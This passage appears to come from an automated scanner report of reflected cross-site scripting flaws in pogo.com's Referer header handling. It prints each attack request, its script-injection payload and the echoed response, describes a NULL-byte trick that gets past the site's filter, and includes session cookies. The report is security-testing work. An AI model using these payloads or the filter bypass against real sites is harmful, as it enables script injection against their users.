User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:59:44 GMT
Server: Apache-Coyote/1.1
Content-Length: 35542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
kTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button%22";
s.referrer="http://www.google.com/search?hl=en&q=743ee</script><script>alert(1)</script>ff787b7638f";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_homnav_register";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"
...[SNIP]...

3.674. http://www.pogo.com/action/pogo/lightreg.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightreg.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936a3</script><script>alert(1)</script>e61f16ca4d92068c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogo/lightreg.do?site=pogo&screenname=k7240&password=Dunno1&password_confirm=Dunno1&gender=F&birth_month=1&birth_day=1&birth_year=1970&country=US&email=test%40fastdial.net&lightreg_newword=0&wordverresponse=ckgwjx&accept=Accept HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=936a3</script><script>alert(1)</script>e61f16ca4d92068c9
Cache-Control: max-age=0
Origin: http://www.pogo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 37723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=936a3</script><script>alert(1)</script>e61f16ca4d92068c9";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_header_prizes";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";

...[SNIP]...

3.675. http://www.pogo.com/action/pogo/lightregview.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightregview.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e92</script><script>alert(1)</script>ea0af40b809 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogo/lightregview.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c9e92</script><script>alert(1)</script>ea0af40b809
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 35353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=c9e92</script><script>alert(1)</script>ea0af40b809";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.676. http://www.pogo.com/action/pogop/welcome.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogop/welcome.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65815</script><script>alert(1)</script>fc1dcdbed34 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_right_button HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: 65815</script><script>alert(1)</script>fc1dcdbed34
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:34 GMT
Server: Apache-Coyote/1.1
Content-Length: 35382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
ackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="65815</script><script>alert(1)</script>fc1dcdbed34";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.677. http://www.pogo.com/all-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/all-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a6d4a</script>c47abe2abdf was submitted in the Referer HTTP header. This input was echoed as a6d4a</script>c47abe2abdf in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /all-games HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=%00a6d4a</script>c47abe2abdf

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:54 GMT
Server: Apache-Coyote/1.1
Content-Length: 107549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=%00a6d4a</script>c47abe2abdf";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - allgames";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:playersOnline::Unauth Category Page filter - allgames:Non Authenticated";

...[SNIP]...

3.678. http://www.pogo.com/board-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/board-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a15ff</script><a>6209259dd1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /board-games?pageSection=footer_board HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=a15ff</script><a>6209259dd1

Response

3.679. http://www.pogo.com/board-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/board-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0015f3c</script><script>alert(1)</script>bb5b1d82243 was submitted in the Referer HTTP header. This input was echoed as 15f3c</script><script>alert(1)</script>bb5b1d82243 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /board-games?pageSection=categorybar_board HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=%0015f3c</script><script>alert(1)</script>bb5b1d82243

Response (redirected)

HTTP/1.1 500
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:00:18 GMT
Server: Apache-Coyote/1.1
Connection: close
Content-Length: 3952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Web Page Problem
   </tit
...[SNIP]...
linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=%0015f3c</script><script>alert(1)</script>bb5b1d82243";
s.eVar2="pogo";
s.pageName="ERROR: Web Page Problem Page";
s.prop2="pogo";
s.channel="games";
s.eVar18="un_categorybar_board";
s.prop7="POGO:games:error::ERROR: Web Page Problem Page:Non Authenticat
...[SNIP]...

3.680. http://www.pogo.com/games/connect.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/connect.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea44</script><script>alert(1)</script>6b50ceea4b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/connect.jsp?game=scrabble&apid=autoratedrules&auto=PlayNow&rule=2player&tab=beginner HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9ea44</script><script>alert(1)</script>6b50ceea4b9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:41:11 GMT
Server: Apache-Coyote/1.1
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_roomsel_text";
s.referrer="http://www.google.com/search?hl=en&q=9ea44</script><script>alert(1)</script>6b50ceea4b9";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.eVar30="SOsub_test_heavy_2";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"
...[SNIP]...

3.681. http://www.pogo.com/home/home.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/home/home.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c8dc</script><script>alert(1)</script>5714e91b8bb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home/home.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4c8dc</script><script>alert(1)</script>5714e91b8bb

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=0C9E45856B352C7935A00CBDAD49129C.000275; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606419910615362; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:20:38 GMT; Path=/
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:20:37 GMT
Server: Apache-Coyote/1.1
Content-Length: 429503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=4c8dc</script><script>alert(1)</script>5714e91b8bb";
s.eVar2="pogo";
s.pageName="Unauth Free Pogo Home Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Unauth Free Pogo Home Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof
...[SNIP]...

3.682. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/homepage/clubpogo-info.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c590</script><script>alert(1)</script>6d39ca2b1f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /hotdeploy/us/homepage/clubpogo-info.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
